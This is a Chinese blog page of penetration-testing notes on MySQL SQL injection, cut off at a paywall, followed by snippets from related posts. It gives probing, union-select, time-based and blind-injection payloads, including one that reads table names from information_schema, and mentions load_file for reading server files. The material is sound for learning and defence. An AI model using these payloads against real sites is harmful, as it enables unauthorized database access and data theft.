【肾透测试笔记 --SQL注入篇_mysql】

最新推荐文章于 2024-06-19 13:35:01 发布
最新推荐文章于 2024-06-19 13:35:01 发布
阅读量569 收藏 2
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/A98llen/article/details/124686708
版权

SQL注入篇_mysql

写在前面

MySQL中的注释

1.单行注释符:# --空格 --+
2.多行注释符:/**/

一些函数

database()				    #数据库名
version()                   #数据库版本信息
user()					    #数据库用户名
current_user()			    #当前用户名
session_user()			    #连接数据库的用户名
@@datadir 				    #数据库的数据存储路径
load_file('文件') 		    #MySQL读取本地文件的函数

注入之前

1.有无回显

?id=1 
?id=2
#页面回显是否不同

2.判断类型

?id=1
?id=1'
?id=1"
#判断注入的类型,若是字符型注入还应考虑闭合的方式

3.有无布尔类型

?id=1 and 1=1
?id=1 and 1=2
?id=1 or 1=2
?id=-1 or 1=2
#观察回显是否不同

4.判断是否有延时

?id=1 and sleep(5)
#看响应时长

一、联合查询

利用union select 语句,同时执行两条select 语句,实现跨库跨表的查询。但是,前提是两条select语句查询出的结果具有相同的列数并且数据类型一致

1.判断列数

?id=1 order by 1 #页面异常
?id=1 order by 8 #页面正常

当前select语句,具有8列

?id=1 union select 1,2,3,4,5,6,7,8

2.判断显示位置

把前面的第一条selec语句置为假

?id=1 and 1=2 union select 1,2,3,4,5,6,7,8

3.修改数字

在页面回显数字后,在对应的数字上修改内容,把数字改为sql函数。如ÿ

最低0.47元/天 解锁文章
夕阳红i
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sql_node-master.zip_MYSQL_node笔记_sql
09-25
为了防止SQL注入,应使用预编译语句和参数绑定。例如: ```javascript const [rows, fields] = await connection.execute( 'SELECT * FROM users WHERE id = ? AND active = ?', [userId, true] ); ``` 7. *...
01-sql-联合查询
居上
10-18 354
01-sql-联合查询查询语法条件过程探测网站是否存在注入点查询当前数据库中数据表的列数查找回显位查询当前数据库中数据表的列数查询数据后台账号和密码 查询 语法 select… union select… 条件 1.查询的两张表具有列数 2.查询的两张表具有相同的字段 过程 探测网站是否存在注入点 打开网站主页,随便打开一个一条新闻 http://192.168.36.131/cms/show.php?id=33 可以看到URL中出现id,改变id值,页面出现跳转 http://192.168.36.
SQL注入
qq_46219965的博客
08-29 762
SQL注入步骤 注入手法:联合查询,报错注入,布尔盲注,延时注入
sql注入之盲注
最新发布
weixin_64815500的博客
06-19 960
sql注入关于无回显用到的盲注,sqli-labs靶场为例子讲解常用盲注类型以及函数。面试或者打ctf可用作参考
Web安全之数据库系统MySQL&Access的SQL注入(二)
weixin_50593647的博客
09-27 382
一、Access是什么 Microsoft Office Access是微软把数据库引擎的图形用户界面和软件开发工具结合在一起的一个数据库管理系统。它是微软OFFICE的一个成员, 在包括专业版和更高版本的office版本里面被单独出售。2018年9月25日,最新的微软Office Access 2019在微软Office 2019里发布。 二、MySQL 是什么 MySQL 是一款安全、跨平台、高效的,并与 PHP、Java 等主流编程语言紧密结合的数据库系统。MySQ...
mysql注入之盲注语句汇总
sirius的博客
08-28 3665
目录 mysql注入之盲注 常用语句汇总 基于bool盲注 查询当前数据库 基于时间的盲注 盲注常用函数: regexp正则注入 like匹配注入 特殊的盲注之报错注入 mysql注入之盲注 什么是盲注? 基于布尔型SQL盲注即在SQL注入过程中,应用程序仅仅返回True(页面)和False(页面)。 盲注就是利用真假条件进行测试。 这时,我们无法根据应用程序的返回页面得到我们需要的数据库信息。但是可以通过构造逻辑判断(比较大小)来得到我们需要的信息。 常用语句汇总 基.
mysql盲注总结
z7sz的博客
06-21 1122
本文的内容主要是对mysql盲注的总结
【基础篇】第01篇:PHP代码审计笔记--SQL注入1
08-03
【PHP代码审计笔记——SQL注入1】主要探讨的是在PHP环境中如何防止SQL注入攻击,特别是针对MySQL数据库。SQL注入是一种常见的网络安全威胁,攻击者通过构造恶意的SQL语句,利用程序漏洞来执行非授权的操作,如获取...
MySQL-docs.zip_/docs/mysql.md_c++ mysql_mysql c++_笔记_编程
09-25
这篇笔记主要涵盖了MySQL的基本概念、SQL语法、数据库管理以及C/C++与MySQL的接口编程,对于想要深入理解和使用MySQL的程序员来说非常有价值。 一、MySQL基础知识 MySQL是一个基于ACID(原子性、一致性、隔离性和...
sql注入-注入漏洞获得数据库数据-kali-sqlmap-运维安全详细笔记
06-30
SQL 注入攻击与防御 SQL 注入是一种常见的 Web 应用安全漏洞,攻击者通过构造特殊的 SQL 语句来访问、修改或控制数据库中的数据。下面我们将详细介绍 SQL 注入的攻击方式、防御方法和相关工具。 一、SQL 注入攻击...
Mysql存储过程学习笔记--建立简单的存储过程
09-10
4. **安全性**:存储过程支持参数化,能够防止SQL注入攻击,并可以通过权限控制对存储过程的访问。 创建存储过程的基本语法如下: ```sql CREATE PROCEDURE 存储过程名称( 输入输出类型 变量名称 类型, 输入输出...
MySQL盲注入
xu_1234567的博客
09-25 400
1.MySQL盲注入原理 MySQL盲注入是在网址追加MySQL IF查询判断语句,通过网页输出来准确判断出ASCII码的值,拿到ASCII码后得到数据库名 2.MySQL函数 在进行MySQL盲注入,的使用以下MySQL函数 database() 查看数据库名 substr(str,1,4) 字符串截取 mid(str,1,4) 字符串截取 ascii码 if (条件,True,False) database() substr(str,1,4) if(条件,1,0) 3.注入测试 ...
Mysql盲注总结
b1ackc4t的博客
01-24 2899
Mysql盲注 当我们无法从显示的页面上直接获取SQL语句的执行结果时,需要进行盲注 手工盲注的基本步骤 判断是否存在注入 字符型还是数值型 猜解当前数据库名 猜解数据库的表名 猜解表中的字段名 猜解数据 下面,我们探讨一下常见的三种盲注 基于报错的盲注 利用条件 系统未关闭数据库报错信息,对于一些sql错误直接回显在了错误上 未对报错函数进行过滤 group by key报错 原理 当在一个聚合函数,比如CONUNT函数后面如果使用分组语句就会把查询的一部分以错误的形式显示出来, co
SQL注入漏洞
haoge1998的博客
04-15 1135
SQL注入漏洞 1、注入攻击的核心点: 拼接有效的语句或代码 确保完成闭合,并且可以改变原有执行逻辑 2、防护: 从代码和sql语句的逻辑层面考虑,不能轻易让密码对比失效 基于用户输入的引号(单引号和双引号)进行转义处理,可以使用PHP内置函数addslashes进行强制转义。 使用mysqli的预处理功能 一、查询注入的数据类型 注入类型可以分为三类: 1、数字型 select * from tables where id = 1; 2、字符型 select * from tables whe
mysql盲注
weixin_55129870的博客
09-23 578
1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))
SQL注入基础
weixin_40195907的博客
11-30 3365
一、SQL注入条件 1、程序没有对输入进行严格的过滤 2、输入的语句能够被带入数据库中执行 二、SQL注入步骤 Step1:判断是否存在注入 字符型 数字型 Step2:获取数据库信息 1、order by 数字 用于判断列数 2、union 合并多条语句的查询结果 3、select 1,2 数据显示位 4、获取用户、数据库版本、数据库 select users(); select version(); select database(); 5、使用information_schema数据库 ①scheme
SQL注入的小知识
qq_52074678的博客
12-11 2495
登录数据库 mysql -u[用户名] -p[密码] 查看数据库 show databases; 使用某个数据库 use [数据库名]; 查看这个库里面有什么表 show tables; 查看table1表中所有的数据 select * from table1; union联合 select * from table1 where id<3 union select 1,2,3; 左边右边同时执行 select * from table1 where id<-3 union sele

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值